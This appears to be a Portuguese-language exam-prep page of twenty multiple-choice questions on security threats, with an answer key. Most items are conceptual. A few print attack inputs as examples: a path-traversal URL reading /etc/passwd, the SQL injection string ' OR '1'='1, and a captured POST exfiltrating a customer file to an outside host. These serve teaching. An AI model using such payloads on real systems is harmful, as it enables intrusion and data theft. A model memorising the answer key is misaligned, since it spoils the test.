Questões de Concurso Comentadas sobre ataques e ameaças em segurança da informação

Foram encontradas 1.757 questões

Q4237473 Segurança da Informação
Ao realizar a atualização do antivírus em um computador do Município, o técnico em informática detecta um código malicioso que estava disfarçado como um utilitário legítimo de limpeza de disco. Esse tipo específico de ameaça é classificado como:
Alternativas
Q4234703 Segurança da Informação
Após Identificar tentativas de ARP Spoofing em uma rede local, a equipe de Infraestrutura decidiu hablltar o Dynamic ARP Inspection em switches de acesso. Em tal situação, o Dynamic ARP Inspection 
Alternativas
Q4232620 Segurança da Informação
 O cavalo de Troia, ou trojan, é um programa que executa outras funções, normalmente maliciosas, além daquelas para as quais foi aparentemente projetado. São tipos de trojan, EXCETO: 
Alternativas
Q4232618 Segurança da Informação
Trata-se de um ataque cibernético que consiste em corromper o processo de resolução de nomes de domínio (DNS), adulterando as configurações locais da máquina ou o cache de um servidor, para direcionar silenciosamente o usuário a um site clonado e fraudulento, mesmo que ele insira a URL correta no navegador. O trecho refere-se a:
Alternativas
Q4231592 Segurança da Informação
Um agente administrativo recebeu um e-mail institucional contendo três arquivos anexos: um documento em formato PDF, uma planilha eletrônica e um arquivo executável (.exe), acompanhado da mensagem: "Abra imediatamente o arquivo para atualização obrigatória do sistema.". Ao perceber que o remetente era desconhecido e que não havia qualquer comunicação prévia do setor de tecnologia da informação, o servidor decidiu não abrir o arquivo executável. Essa decisão representa uma boa prática de segurança da informação porque:
Alternativas
Q4231583 Segurança da Informação
Um agente administrativo recebeu por correio eletrônico mensagem aparentemente enviada pelo setor de tecnologia da informação solicitando atualização imediata da senha institucional. O e-mail continha link para acesso a uma página semelhante ao ambiente oficial da instituição, além de informar que o não preenchimento resultaria no bloqueio da conta em poucas horas. Considerando as boas práticas de segurança da informação, a conduta mais segura é: 
Alternativas
Q4231572 Segurança da Informação

Analise as afirmativas a seguir sobre ameaças digitais.



I. Um ransomware pode criptografar arquivos e exigir pagamento para liberar o acesso aos dados.


II. Um worm é capaz de se propagar automaticamente por redes, sem depender necessariamente da execução manual de um arquivo infectado por cada usuário.


III. Um keylogger tem como finalidade principal registrar as teclas digitadas, podendo capturar senhas e outras informações sensíveis.


IV. Um cavalo de Troia é um programa que sempre se replica automaticamente e infecta outros dispositivos sem qualquer forma de interação do usuário.


V. Uma vulnerabilidade zero-day é uma falha ainda desconhecida ou sem correção disponível no momento em que passa a ser explorada.



Está correto o que se afirma em: 

Alternativas
Q4231571 Segurança da Informação
Uma funcionária recebeu uma mensagem aparentemente enviada pelo suporte técnico da plataforma educacional da escola. O texto informava que sua conta seria bloqueada em 30 minutos e apresentava um link para “confirmar imediatamente” o nome de usuário e a senha. Ao posicionar o cursor sobre o link, ela percebeu que o endereço eletrônico não correspondia ao domínio oficial da plataforma. Diante da situação apresentada, assinale a conduta incorreta.
Alternativas
Q4229297 Segurança da Informação
Relacione corretamente os tipos de malwares às suas respectivas características:
I. Rootkit
II. Worm
III. Trojan
IV. Ransomware
( ) Malware que se propaga automaticamente pela rede ou entre dispositivos, sem depender necessariamente da ação direta do usuário após a infecção inicial.
( ) Malware desenvolvido para ocultar sua presença no sistema comprometido, dificultando sua detecção por usuários e ferramentas de segurança.
( ) Malware que aparenta ser um software legítimo ou confiável para induzir o usuário à instalação ou execução.
( ) Malware que bloqueia ou criptografa arquivos e exige pagamento para liberação do acesso às informações.
Assinale a alternativa que apresenta a sequência correta:
Alternativas
Q4226678 Segurança da Informação
Relacione corretamente os tipos de ataques de engenharia social às respectivas características:

I. Phishing
II. Tailgating
III. Baiting
IV. Vishing

( ) Utiliza ligações telefônicas para convencer vítimas a fornecer informações confidenciais.
( ) Explora a curiosidade da vítima por meio de dispositivos ou arquivos aparentemente atrativos contaminados com malware.
( ) Ocorre quando uma pessoa não autorizada acompanha alguém autorizado para acessar área restrita.
( ) Utiliza mensagens fraudulentas, como e-mails ou SMS, para induzir vítimas a fornecer dados sensíveis.

Assinale a alternativa que apresenta a sequência correta:
Alternativas
Q4226677 Segurança da Informação
Com base nos conceitos relacionados à engenharia social, assinale a alternativa correta: 
Alternativas
Q4219820 Segurança da Informação
Durante uma auditoria de segurança, uma equipe identificou que alguns usuários de uma organização estavam sendo direcionados para uma página falsa visualmente idêntica ao portal legítimo da instituição. Nessa página fraudulenta, os usuários informavam as suas credenciais, que eram posteriormente utilizadas por terceiros para acessar sistemas corporativos.
A partir dessa situação hipotética, é correto afirmar que o ataque descrito está associado especificamente ao termo
Alternativas
Q4218771 Segurança da Informação
O analista de TI do IFCE recebeu um alerta do sistema de monitoramento indicando tráfego anômalo originado de um servidor web institucional. Ao investigar, identificou que: o servidor estava estabelecendo conexões de saída para endereços IP externos desconhecidos na porta 4444; grandes volumes de dados estavam sendo exfiltrados; o processo httpd havia sido substituído por um binário malicioso; e os logs do servidor indicavam que a intrusão ocorreu por meio de uma vulnerabilidade em um plugin desatualizado do CMS instalado. Diante desse incidente de segurança em andamento, qual deve ser o procedimento imediato mais adequado, seguindo as boas práticas de resposta a incidentes? 
Alternativas
Q4218249 Segurança da Informação
Uma instituição pública passou a expor parte de seus serviços por meio de APIs utilizadas na comunicação entre sistemas internos e aplicações externas.
Em uma revisão de segurança, a equipe técnica avaliou diferentes medidas de proteção dos recursos expostos, considerando aspectos ligados a controle de acesso, proteção das comunicações, tratamento das requisições recebidas e limitação do uso dos serviços.
Sobre esse contexto, assinale a opção que apresenta uma medida tecnicamente adequada. 
Alternativas
Q4218213 Segurança da Informação
Um professor da rede municipal recebeu um e-mail informando que sua conta institucional seria bloqueada e que, para evitar o bloqueio, deveria clicar em um link e informar seus dados de acesso. O e-mail apresentava erros de escrita e um endereço eletrônico semelhante, mas não idêntico, ao domínio oficial da instituição. Considerando conceitos básicos de segurança na internet, assinale a alternativa que apresenta a conduta adequada diante dessa situação.
Alternativas
Q4218146 Segurança da Informação
Durante a investigação de um incidente, um analista identificou tráfego suspeito saindo de um servidor interno para um endereço externo na porta 8081, não usual para o ambiente.
O analista, usando o Wireshark, realizou a captura de pacotes diretamente do servidor interno, sem perdas, aplicou o filtro tcp.port == 8081 e, ao selecionar uma das conexões, utilizou o recurso Follow TCP Stream, obtendo o seguinte diálogo:

POST /sync HTTP/1.1
Host: update-service.external.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Content-Length: 1024

file=clientes.csv&data=Q2xpZW50ZTosQ1BGLENhcnRhbwoxMjMs MDAwMDAw... (trecho exibido pelo Follow TCP Stream)" 

Com base nesse cenário, assinale a opção que apresenta a interpretação mais adequada. 
Alternativas
Q4218142 Segurança da Informação
O XSS (Cross-site Scripting) é um ataque do tipo injection, que traz riscos se não for tratado corretamente. O site OWASP top 10 na sua lista de 2025, elenca o ataque de injection na quinta posição, mostrando a importância da sua mitigação para um desenvolvimento seguro.

Assinale a opção que indica o procedimento correto para mitigar ataques do tipo XSS. 
Alternativas
Q4218128 Segurança da Informação
O OWASP Top 10:2025 apresenta as principais categorias de riscos de segurança em aplicações web, incluindo falhas relacionadas à manipulação inadequada de entradas fornecidas pelo usuário.
Uma aplicação web, hospedada no endereço http://www.eth0123.com, permite acesso a informações jornalísticas por meio do seguinte endereço:
“ http://www.eth0123.com/acesso.php?arq=jornal “
Durante uma análise de segurança, verificou-se que o parâmetro “arq” é utilizado pela aplicação para carregar conteúdos armazenados no servidor. Em razão de falha na validação de entradas fornecidas pelo usuário, foi possível manipular o endereço de acesso conforme apresentado abaixo, permitindo visualizar o conteúdo de um arquivo sensível do sistema:
http://www.eth0123.com/acesso.php?arq=../../etc/passwd

Assinale a opção que apresenta, corretamente, a técnica de exploração usada nesse cenário. 
Alternativas
Q4216643 Segurança da Informação
Um servidor recebe um e-mail supostamente enviado pelo setor de tecnologia do órgão, com o assunto “Ação imediata: sua conta será bloqueada hoje”. A mensagem solicita que ele clique em um link encurtado para “confirmar a senha” e informa que há um anexo para instalação de uma atualização urgente. Assinale alternativa que indica qual conjunto de elementos indica maior probabilidade de phishing. 
Alternativas
Q4215968 Segurança da Informação

Durante uma auditoria de segurança, foi identificado que um campo de login de uma aplicação web aceita a entrada ‘ OR  ‘1’ = ’1 e retorna acesso não autorizado ao sistema, indicando que a consulta enviada ao banco de dados foi alterada devido à ausência de sanitização de parâmetros fornecidos pelo usuário, configurando um ataque do tipo:

Alternativas
Respostas
1: A
2: D
3: D
4: D
5: C
6: D
7: D
8: D
9: A
10: E
11: B
12: C
13: E
14: C
15: E
16: D
17: E
18: B
19: D
20: A